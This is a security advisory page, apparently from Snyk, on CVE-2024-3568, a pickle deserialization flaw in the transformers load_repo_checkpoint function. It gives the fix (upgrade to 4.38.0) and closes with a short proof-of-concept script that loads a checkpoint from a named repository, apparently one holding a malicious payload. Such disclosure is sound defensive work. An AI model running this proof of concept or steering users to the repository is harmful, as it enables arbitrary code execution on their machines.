Deserialization of Untrusted Data Affecting transformers package, versions [,4.38.0)
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-TRANSFORMERS-6239525
- published 11 Apr 2024
- disclosed 8 Feb 2024
- credit Patrick Peng
Introduced: 8 Feb 2024
CVE-2024-3568 Open this link in a new tabHow to fix?
Upgrade transformers
to version 4.38.0 or higher.
Overview
transformers is a State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow
Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the load_repo_checkpoint
function of the TFPreTrainedModel
class. An attacker can execute arbitrary code and commands by crafting a malicious serialized payload, exploiting the use of pickle.load
on data from potentially untrusted sources. This vulnerability allows for remote code execution by deceiving victims into loading a seemingly harmless checkpoint during a normal training process, thereby enabling attackers to execute arbitrary code on the targeted machine.
Note:
Even if the function calls pickle.load()
, which permits remote code execution from an untrusted repo, this function was essentially deprecated and unused code that is not called in any standard workflow, so the attacker would have to induce the user to call this unusual function in addition to preparing a repo with a malicious payload.
PoC
from transformers import TFAutoModel
from tensorflow.keras.optimizers import Adam
model = TFAutoModel.from_pretrained('bert-base-uncased')
model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.load_repo_checkpoint('Retr0REG/EvanModel')